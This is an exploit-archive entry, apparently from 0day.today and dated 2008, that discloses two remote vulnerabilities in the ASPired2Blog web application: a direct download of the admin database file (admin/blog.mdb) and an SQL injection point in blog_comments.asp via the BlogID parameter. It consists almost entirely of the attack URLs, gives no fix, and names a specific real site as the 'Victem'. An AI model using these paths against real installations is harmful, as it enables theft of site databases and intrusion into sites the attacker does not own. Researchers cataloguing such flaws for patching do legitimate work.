id: 4430
date: 12/12/2008
title: The Net Guys ASPired2Blog (SQL/DD) Multiple Remote Vulnerabilities
author: Pouya_Server
cves: 

==================================================================
The Net Guys ASPired2Blog (SQL/DD) Multiple Remote Vulnerabilities
==================================================================


#########################################################
---------------------------------------------------------
Portal Name: ASPIred2Blog
Vendor : http://thenetguys.us/Home/Blog.asp
Author : Pouya_Server 
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/admin/blog.mdb
 
[SQL]:
http://site.com/[Path]/admin/blog_comments.asp?BlogID='[SQL]
 
---------------------------------
Victem :
http://thenetguys.us/ASPired2/Blog/index.asp


#  0day.today [2023-03-26]  #